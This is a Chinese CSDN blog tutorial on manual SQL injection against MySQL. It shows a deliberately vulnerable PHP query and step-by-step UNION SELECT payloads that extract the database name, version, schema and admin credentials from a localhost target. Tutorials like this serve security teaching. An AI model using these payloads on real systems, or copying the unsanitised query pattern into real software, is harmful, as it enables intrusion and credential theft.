sql注入 mysql 猜数据库名字_web渗透-SQL注入数据库信息盗取

最新推荐文章于 2024-04-27 17:37:33 发布
最新推荐文章于 2024-04-27 17:37:33 发布
阅读量684 收藏 2
点赞数
文章标签: sql注入 mysql 猜数据库名字
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33198642/article/details/114470559
版权

SQL注入 数据库安全 注入点检测 信息获取 防护策略
关键词由CSDN通过智能技术生成

sql注入原理

脚本代码接收来自前端数据未进行过滤,导致恶意sql语句插入到数据库中查询执行。

如下代码:

$id = $_GET['id'];

$sql = "select * from user where id=$id";

.......

$result = mysql_query($sql);

?>

sql注入攻击流程

1.and语法判断是否存在注入点

And 1=1正确页面

And 1=2错误页面

结果:如果以上两条语句都没有引起页面错误,则判断此处存在注入点

2.order by 语句获取查询字段数目

order by 5正确order by 6错误那么该表存在5个字段数目

3.获取数据库相应信息

Database() :数据库名 fanke

Version() :数据库版本 5.5.40

User() : 数据库用户 root@localhost

@@version_compile_os :操作系统 win32

http://127.0.0.1:80/index.php?id=1 union select User() ,Database(),3,4,5

4.通过数据库名字获取以下信息

要求:Mysql5.0以上版本

Information_schema:存储mysql数据库下所有数据库的表名和列名信息的自带数据库

table_name:表名

table_schema:数据库名

column_name:列名

information_schema.tables:存储mysql数据库下所有数据库的表名信息的表

information_schema.columns:存储mysql数据库下所有数据库的列名信息的表

http://127.0.0.1:80/index.php?id=1 union select table_name,column_name,2,3,4,5

如果sql版本比较低则用以下方法

3.union 查询猜表名字

猜测数据库是否存在admin表

4.猜数据库列名字

http://127.0.0.1:80/index.php?id=1 union select 1,username,3,password,5 from admin

猜测数据库是否存在username、password列名字

cstghitpku
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入(bybx).docx
09-05
SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过输入恶意数据来盗取或修改数据库中的数据。因此,开发者需要采取相应的防御措施,例如使用参数化查询、白名单输入验证、限制数据库权限等,以保护Web应用...
mysql 注入测试_SQL注入之DVWA平台测试mysql注入
weixin_30395665的博客
01-19 286
今天主要针对mysql常用注入语句进行测试。测试环境与工具:测试平台:DVWA,下载地址:http://down.51cto.com/data/875088,也可下载metaspolit-table2虚拟机,里面已经部署好了dvwa.。渗透工具:burpsuite-1.4.07下载地址:http://down.51cto.com/data/875103首先我们介绍下DVWA和Burpsuite,D...
mysql手工解表名_解决windows 下mysql 表名自动转成小写的问题
weixin_31018573的博客
02-03 103
由于web用的是mvc,数据库用的是mysql。为了方便开发,在windows7下面也安装了个mysql,今天在创建表的时候,遇到了个棘手的问题。所有的表名都转成了小写,这不是我要的,作为处女座,是不能容忍这样的事情存在的。经过一番折腾后,终于解决了,方法如下。第一步:先在navicat的tools里面选择console,然后输入:show variables like ‘lower_case_...
网络安全-Mysql注入知识点_length(database())
最新发布
2401_84300128的博客
04-27 1013
sql语句查询结果。
漏洞篇(SQL注入一)
m0_58001548的博客
03-26 1215
此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一个空用户,or 表示左右两边只要有一边条件判断成立则该语句返回结果为真,其中 1=1 永远为真,所以当前 SQL 语句无论怎么执行结果永远为真,--空格表示注释,注释后面所有代码不再执行。我们可以看到上面我们闭合的方法是没有输入用户名的,所以并不能成功登陆。
SQL注入--第二关详细讲解
MAY的博客
04-18 1014
SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
sql注入(获取数据库
rnn0921的博客
08-03 2041
程序没有细致过滤用户输入的数据,从而导致非法数据进入系统。SQL注入就是把SQL命令插入到Web表单然后提交到所在页面请求(查询字符串),从而达到欺骗服务器执行恶意的SQL命令。它是利用现在已有的应用程序,将SQL语句插入到数据库中执行,执行一些并非按照设计者意图的SQL语句。
保障MySQL数据安全的一些建议
01-21
每年业界都会传出几起大事件,某知名或不知名的公司被脱裤(拖库的谐音,意思是整个数据库被黑客盗取)之类的。 从数据安全上也可以分为外网安全及内部操作安全,下面分别讨论一下。 内部操作安全策略 1. 是否回收...
MySQL中患者数据的匿名化
04-04
MySQL作为一个广泛应用的关系型数据库管理系统,提供了多种方法来处理敏感数据,如患者数据。本文将深入探讨如何在MySQL中进行患者数据的匿名化,确保信息安全的同时满足合规性要求。 一、数据匿名化的概念与意义 ...
企业信息安全-据库安全(中小规模).docx
09-14
1. 黑客攻击:黑客通过Web漏洞,如SQL注入或上传漏洞,利用Webshell等手段直接获取数据库数据。例如,SQL注入漏洞允许黑客构造特定的SQL语句,直接拖库;而上传漏洞则可能让黑客部署Webshell,进一步控制数据库。 ...
WEB常见漏洞与挖掘技巧研究.pptx
06-10
SQL 注入是 WEB 安全中最常见的漏洞之一,通常是由于 SQL 语句的拼接不当所致。根据乌云上的数据,SQL 注入是最常见的漏洞之一,大部分是由于开发人员缺乏安全意识或编码不当所致。 案例:某安全公司的内部网站存在...
渗透测试----手把手教你SQL手工注入--(联合查询,报错注入)
weixin_52796034的博客
10-09 1455
报错注入是一种特殊的SQL注入攻击方式,它利用了应用程序对异常处理的不完善,通过在输入的SQL语句中插入恶意的SQL语句,达到获取未授权数据的目的。 在报错注入中,我们可以通过在输入的数据中插入SQL语句的异常字符,使得应用程序抛出异常,从而获取应用程序的错误信息。这些错误信息可能包含了应用程序的敏感数据,如数据库表结构、列名、存储过程等。
pikachu如何利用字符型SQL注入拿下数据库
m0_61903602的博客
10-30 876
pikachu如何利用字符型SQL注入拿下数据库
SQL注入之获取数据库用户表数据
qq_59099375的博客
03-18 1288
SQL注入获取数据库数据
SQL注入 - Part 1
捡破烂日记^ ^
05-20 1357
1.web网站基本架构 2.如何构建可以执行的语句 3.sql注入的完整流程
SQL注入简介和注入方法教学
HAKUNAMATATATTA的博客
11-14 5064
以sqli-labs靶场为例,详细介绍GET显错注入,GET盲注等一系列最新常见得SQL注入方法
SQL注入——字符型union注入
heyingcheng的博客
03-04 578
使用union注入拿到靶机中数据库里的所有用户名和密码查询语句:select 列名 from 表名 where 限定语句以sql-labs中的less-1为例。
15分钟了解sql注入(一) union注入
贤鱼的博客
09-24 1851
union注入详细教程
渗透测试-SQL注入之核心语法获取数据库信息
lza20001103的博客
04-18 6257
渗透测试-SQL注入之核心语法获取数据库信息
SQL注入基础:解析Access数据库的注入技术
在网络安全领域,SQL注入是一种常见的攻击手段,通过利用应用程序处理用户输入数据时的疏忽,攻击者可以在Web应用程序中插入恶意的SQL语句,以获取未经授权的数据访问权限。标题提到的"左键单击admin选中点击检测...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值